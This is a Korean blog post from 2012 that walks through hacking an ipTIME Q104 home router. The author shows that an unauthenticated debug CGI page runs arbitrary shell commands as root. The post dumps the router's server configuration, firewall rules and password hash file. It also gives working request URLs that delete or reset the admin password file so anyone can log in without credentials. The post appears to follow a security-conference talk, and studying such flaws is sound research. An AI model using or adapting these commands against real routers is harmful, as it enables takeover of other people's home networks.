2012.07.17 08:38






정우형 시큐인사이드 발표 영상

https://www.youtube.com/watch?v=_6XrBSrnkTQ&feature=youtu.be

데일리 시큐 기사 

http://www.dailysecu.com/news_view.php?article_id=2585 



http://returnaddr.org/b0d/view.php?id=mydoc_secudoc&page=1&sn1&divpage=1&sn=off&ss=on&sc=on&select_arrange=hit&desc=asc&no=6&PHPSESSID=3f5a7202e2ea46023bd01491e08ff60d 


* IPTIME 공유기 해킹 과정 정리 *

ㅇ 장비명 : IpTIME Q104
ㅇ 벤   더 : EFM Networks
ㅇ 접근포트 : http://192.168.0.1 (http://192.168.0.1:55555, http://192.168.255.1:55555)

- BASIC Auth 사용하여 인증
- 디폴트 password (admin/null)와 쉬운 PW를 찍었으나 실패.
- 울프팀 게임으로 인해 과다 트래픽 감지 / 차단되어 경고 창 뜸
- 소스보기 => 리포트 화면이 iframe 으로 구성된 것을 확인
- 소스 : <iframe width="600" height="430" name="subwin" src="http://192.168.0.1/nd-bin/netdetect.cgi?flag=nd-report">
http://192.168.0.1/cgi-bin/timepro.cgi?flag=debug
  는 AUTH를 거치지만,
  http://192.168.0.1/nd-bin/netdetect.cgi?flag=debug 는 거치지 않고 아래창 뜸

      File Name :  [                         ]
   Command Name :  [                         ]
        [Show]

  action이 /cgi-bin/timepro.cgi 지만, netdetect.cgi로 해주고
  input 태그 값인 cmd에 원하는 명령 입력하여 실행!

-----------------------
/var/boa_vh.conf
-----------------------
Port 55555 
User root 
Group root 
ServerAdmin root@localhost 
VirtualHost 
DocumentRoot /home/httpd 
UserDir public_html 
DirectoryIndex index.html 
KeepAliveMax 100 
KeepAliveTimeout 10 
MimeTypes /etc/mime.types 
DefaultType text/plain 
AddType application/x-httpd-cgi cgi 
AddType text/html html 
ScriptAlias /cgi-bin/ /bin/ 
ScriptAlias /nd-bin/ /bin/ 
ScriptAlias /login/ /bin/login/ 
ScriptAlias /ddns/ /bin/ddns/ 
ScriptAlias /testbin/ /tmp/ 
ServerName IPRouter 
SinglePostLimit 2097152 
Auth /cgi-bin /etc/httpd.passwd 
Auth /main /etc/httpd.passwd 

-----------------------
/var/firewall_rule
-----------------------
separator:----- Messenger -----:0: 
aim:AIM:1:32:nat:app_filter:tcp:0:5190:filter_dnat:0 
buddy:버디버디:3:32:nat:app_filter:tcp:0:952:filter_dnat:0:+:32:nat:app_filter:tcp:0:810-819:filter_dnat:0:+:32:nat:app_filter:tcp:0:940-959:filter_dnat:0 
icq:ICQ:1:32:nat:app_filter:tcp:0:5190:filter_dnat:0 
iman:IMAN(KT):1:32:nat:app_filter:tcp:0:5282:filter_dnat:0 
irc:IRC:2:32:nat:app_filter:tcp:0:6660-6669:filter_dnat:0:+:32:nat:app_filter:udp:0:6660-6669:filter_dnat:0 
msm:MSN 메신저:3:32:nat:app_filter:tcp:0:1863:filter_dnat:0:+:32:nat:app_filter:tcp:0:6891-6900:filter_dnat:0:+:16:url:messenger.hotmail.com: 
nateon:네이트온:2:32:nat:app_filter:tcp:0:5004:filter_dnat:0:+:16:url:prs.nate.com: 
tachy:타키(SayClub):1:32:nat:app_filter:tcp:0:6699:filter_dnat:0 
separator:-------- P2P --------:0: 
edonkey:eDonkey,Pruna,eMule:1:32:nat:app_filter:tcp:0:4661-4662:filter_dnat:0 
fileguri:파일구리:1:32:nat:app_filter:tcp:0:9493:filter_dnat:0 
guruguru:구루구루:2:32:nat:app_filter:tcp:0:9292:filter_dnat:0:+:32:nat:app_filter:tcp:0:22000-22400:filter_dnat:0 
soribard:소리바다:2:32:nat:app_filter:udp:0:7674-7675:filter_dnat:0:+:32:nat:app_filter:udp:0:22321:filter_dnat:0 
winmx:WinMX:2:32:nat:app_filter:tcp:0:6699:filter_dnat:0:+:32:nat:app_filter:udp:0:6257:filter_dnat:0 
separator:-------- Game -------:0: 
diable:디아블로:1:32:nat:app_filter:tcp:0:4000:filter_dnat:0 
kartrider:카트라이더:2:32:nat:app_filter:tcp:0:39311:filter_dnat:0:+:32:nat:app_filter:tcp:0:36567:filter_dnat:0 
lineage:리니지:2:32:nat:app_filter:tcp:0:1950-2002:filter_dnat:0:+:32:nat:app_filter:tcp:0:2004-2200:filter_dnat:0 
mu:뮤:1:32:nat:app_filter:tcp:0:44405:filter_dnat:0 

-----------------------
/etc/httpd.passwd
-----------------------
admin:$1S89Y1UUF3Ls:

- echo 명령을 이용하여 httpd.passwd 내용을 "admin::" 로 비번 초기화 시킨 후,
   password 인증 없이 접속!!

http://192.168.255.1:55555/cgi-bin/timepro.cgi?flag=debug&cmd=rm -f /etc/httpd.passwd
http://192.168.255.1:55555/cgi-bin/timepro.cgi?flag=debug&cmd=cp /etc/httpd.passwd.bak /etc/httpd.passwd
- 잡업 후 복구 해야~

by xcuter

Posted by k1rha